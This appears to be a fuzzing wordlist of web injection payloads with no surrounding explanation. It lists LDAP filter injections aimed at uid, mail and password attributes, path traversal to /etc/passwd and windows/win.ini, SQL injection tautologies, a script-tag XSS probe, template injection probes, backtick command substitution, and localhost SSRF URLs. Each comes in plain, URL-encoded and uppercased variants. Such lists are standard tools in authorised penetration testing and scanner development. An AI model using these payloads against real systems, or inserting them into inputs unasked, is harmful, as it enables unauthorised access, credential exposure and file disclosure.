*)(uid=*))(|(uid=*
*)(|(mail=*))
admin*)(|(password=*))
*)(cn=*))(|(cn=*
*()|&'
test
baseline
AUROSE_PROBE
../../../../etc/passwd
..\..\..\..\windows\win.ini
' OR '1'='1
" OR "1"="1
<script>alert(1)</script>
${7*7}
{{7*7}}
`id`
127.0.0.1
http://127.0.0.1
https://example.com
%2A%29%28uid%3D%2A%29%29%28%7C%28uid%3D%2A
%2A%29%28%7C%28mail%3D%2A%29%29
admin%2A%29%28%7C%28password%3D%2A%29%29
%2A%29%28cn%3D%2A%29%29%28%7C%28cn%3D%2A
%2A%28%29%7C%26%27
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
%27%20OR%20%271%27%3D%271
%22%20OR%20%221%22%3D%221
%3Cscript%3Ealert%281%29%3C%2Fscript%3E
%24%7B7%2A7%7D
%7B%7B7%2A7%7D%7D
%60id%60
http%3A%2F%2F127.0.0.1
https%3A%2F%2Fexample.com
*)(UID=*))(|(UID=*
*)(|(MAIL=*))
ADMIN*)(|(PASSWORD=*))
*)(CN=*))(|(CN=*
TEST
BASELINE
../../../../ETC/PASSWD
..\..\..\..\WINDOWS\WIN.INI
<SCRIPT>ALERT(1)</SCRIPT>
`ID`
HTTP://127.0.0.1
HTTPS://EXAMPLE.COM
%2A%29%28UID%3D%2A%29%29%28%7C%28UID%3D%2A
%2A%29%28%7C%28MAIL%3D%2A%29%29
ADMIN%2A%29%28%7C%28PASSWORD%3D%2A%29%29
%2A%29%28CN%3D%2A%29%29%28%7C%28CN%3D%2A
..%2F..%2F..%2F..%2FETC%2FPASSWD
..%5C..%5C..%5C..%5CWINDOWS%5CWIN.INI
%3CSCRIPT%3EALERT%281%29%3C%2FSCRIPT%3E
%60ID%60
HTTP%3A%2F%2F127.0.0.1
HTTPS%3A%2F%2FEXAMPLE.COM
*)(uid%3D*))(|(uid%3D*
*)(|(mail%3D*))
admin*)(|(password%3D*))
*)(cn%3D*))(|(cn%3D*
' OR '1'%3D'1
" OR "1"%3D"1
*)(UID%3D*))(|(UID%3D*
*)(|(MAIL%3D*))
ADMIN*)(|(PASSWORD%3D*))
*)(CN%3D*))(|(CN%3D*
*)(uid=*))(|(uid=*?v=0
*)(uid=*))(|(uid=*&v=0
%2A%29%28uid%3D%2A%29%29%28%7C%28uid%3D%2A_0
ldap_0
/ldap/0
*)(uid=*))(|(uid=*%0a0
*)(|(mail=*))?v=1
*)(|(mail=*))&v=1
%2A%29%28%7C%28mail%3D%2A%29%29_1
ldap_1
/ldap/1
*)(|(mail=*))%0a1
admin*)(|(password=*))?v=2
admin*)(|(password=*))&v=2
